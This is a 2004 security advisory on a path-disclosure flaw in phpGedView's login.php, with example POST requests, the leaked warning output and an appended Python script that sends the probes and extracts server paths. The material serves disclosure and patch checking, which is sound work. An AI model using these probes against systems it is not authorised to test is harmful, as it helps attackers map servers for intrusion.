netVigilance Security Advisory 1

PhpGedView Path Disclosure Vulnerability


Description:
login.php in phpGedView 2.65 and earlier allows remote attackers to obtain sensitive information via an HTTP request to login.php that does not contain the required username or password parameters, which causes the information to be leaked in an error message.

External References:
Mitre CVE: CAN-2004-0130
Securiteam Listing: unixfocus/5NP0M1PBPQ

Summary:
phpGedView is an open source system for online viewing of GEDCOM data (family tree and genealogy information). A security problem in the product allows remote attackers to learn the absolute filesystem path of the server-side script, which reveals the web root and installation directory of the application.

Release Date:
January 25 2004

Severity:
Medium

SecureScout Testcase ID:
TC 17865 (released February 6th, 2004)

Vulnerable Systems:
phpGedView version 2.65 and prior

Vulnerability Type:
Input Validation error - login.php uses the posted username, password and usertime fields without first checking that they were supplied (for example with isset()). PHP then emits an "Undefined index" or empty-parameter warning which, when display_errors is enabled, is returned to the client together with the script's absolute path. Disabling display_errors hides the warning from clients but does not remove the missing check.

Vendor Status:
The vendor has been notified and has released version 2.65.3, which fixes the problem.

Example:
I - Path disclosure

-- HTTP Client Request --

http://target/phpGedView/login.php POST DATA: action=login

-- HTTP Client Request --

The username and password parameters are missing, so PHP emits warnings that
disclose the script's absolute filesystem path.

-- HTTP Server Reply --

<br />
<b>Warning</b>: Undefined index: username in
<b>/var/www/phpGedView/login.php</b> on line <b>36</b><br />
<br />
<b>Warning</b>: Undefined index: password in
<b>/var/www/phpGedView/login.php</b> on line <b>36</b><br />
<br />
<b>Warning</b>: Cannot add header information - headers already sent by (output
started at /var/www/phpGedView/login.php:36) in
<b>/var/www/phpGedView/functions_print.php</b> on line <b>492</b><br />

-- HTTP Server Reply --

-------------------------------------------

II - Path disclosure with a valid user account

-- HTTP Client Request --

http://target/phpGedView/login.php POST DATA:
action=login&url=editconfig.php&usertime=&username=admin&password=login

-- HTTP Client Request --

The username/password pair must be valid. The usertime parameter is empty, so
PHP emits a warning that discloses the absolute filesystem path.

-- HTTP Server Reply --

<br />
<b>Warning</b>: strtotime() called with empty time parameter in
<b>/var/www/phpGedView/login.php</b> on line <b>39</b><br />
<br />
<b>Warning</b>: Cannot add header information - headers already sent by (output
started at /var/www/phpGedView/login.php:39) in <b>/var/www/phpGedView/login.php</b> on
line <b>44</b><br />

-- HTTP Server Reply --
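The two probes above as a small checker, added here as an example; it is not part of the original advisory or of phpGedView. It builds the POST bodies shown in the advisory, sends them (optionally) to a host given on the command line, and extracts every server-side path and line number that PHP's HTML-formatted warnings disclose. The placeholder credentials in probe II and the target URL are assumptions; the sample replies are transcribed from the advisory as constructed test data so the parsing runs offline.

```python
import posixpath
import re
import urllib.error
import urllib.parse
import urllib.request

# POST bodies from the advisory. Probe I needs no account. Probe II needs a valid
# username/password; "admin"/"login" are placeholders from the advisory, not known
# defaults (assumption).
PROBE_NO_CREDENTIALS = {"action": "login"}
PROBE_EMPTY_USERTIME = {
    "action": "login",
    "url": "editconfig.php",
    "usertime": "",
    "username": "admin",
    "password": "login",
}

# PHP's HTML-formatted warnings end with "in <b>/path/file.php</b> on line <b>N</b>".
_IN_FILE = re.compile(r"in\s*<b>(/[^<]+)</b>\s*on line\s*<b>(\d+)</b>", re.I)
# "headers already sent" warnings also name where output started: "/path/file.php:N".
_OUTPUT_STARTED = re.compile(r"output started at\s+(/[^\s:)]+):(\d+)", re.I)
# The message text between "Warning:" and the file reference.
_WARNING = re.compile(r"<b>Warning</b>:\s*(.*?)\s+in\s*<b>/", re.I | re.S)


def encode_probe(fields):
    """urlencode a probe dict into a POST body."""
    return urllib.parse.urlencode(fields).encode()


def leaked_paths(body):
    """Unique (absolute path, line) pairs disclosed in PHP warning output, sorted."""
    found = set()
    for path, line in _IN_FILE.findall(body) + _OUTPUT_STARTED.findall(body):
        found.add((path, int(line)))
    return sorted(found)


def warning_messages(body):
    """Warning texts with whitespace normalised, e.g. 'Undefined index: username'."""
    return [" ".join(m.split()) for m in _WARNING.findall(body)]


def webroot_guess(paths):
    """Longest common directory of the leaked paths (the likely install directory)."""
    dirs = sorted({posixpath.dirname(p) for p, _ in paths})
    return posixpath.commonpath(dirs) if dirs else None


def is_vulnerable(body):
    """True when the reply leaks at least one server-side path."""
    return bool(leaked_paths(body))


def probe(base_url, fields, timeout=10):
    """POST a probe to <base_url>/login.php and return the body (live use only)."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/login.php",
        data=encode_probe(fields),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        # A 500 still carries the warning text when display_errors is on.
        return err.read().decode("utf-8", "replace")


# Sample replies transcribed from the advisory (constructed test data, not live output).
SAMPLE_REPLY_I = (
    "<br />\n<b>Warning</b>:  Undefined index: username in "
    "<b>/var/www/phpGedView/login.php</b> on line <b>36</b><br />\n"
    "<br />\n<b>Warning</b>:  Undefined index: password in "
    "<b>/var/www/phpGedView/login.php</b> on line <b>36</b><br />\n"
    "<br />\n<b>Warning</b>:  Cannot add header information - headers already sent by "
    "(output started at /var/www/phpGedView/login.php:36) in "
    "<b>/var/www/phpGedView/functions_print.php</b> on line <b>492</b><br />\n"
)
SAMPLE_REPLY_II = (
    "<br />\n<b>Warning</b>:  strtotime() called with empty time parameter in "
    "<b>/var/www/phpGedView/login.php</b> on line <b>39</b><br />\n"
    "<br />\n<b>Warning</b>:  Cannot add header information - headers already sent by "
    "(output started at /var/www/phpGedView/login.php:39) in "
    "<b>/var/www/phpGedView/login.php</b> on line <b>44</b><br />\n"
)
# What a patched or display_errors=Off install returns: just the login form.
SAMPLE_REPLY_FIXED = "<html><body><form method=\"post\">login form</form></body></html>"

if __name__ == "__main__":
    import sys
    body = probe(sys.argv[1], PROBE_NO_CREDENTIALS) if len(sys.argv) > 1 else SAMPLE_REPLY_I
    for path, line in leaked_paths(body):
        print(f"leaked: {path}:{line}")
    print("webroot guess:", webroot_guess(leaked_paths(body)))
```

Run it as `python check.py http://target/phpGedView` to send probe I; with no argument it parses the advisory's sample reply. A reply with no warnings does not prove the install is patched: an administrator may simply have set display_errors to Off, which hides the path but leaves the missing isset() check in place, so the version string should still be compared against 2.65.3.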

Credits:
Cedric Cochin - netVigilance Vulnerability Research team


Copyright © 2004, netVigilance, Inc. All rights reserved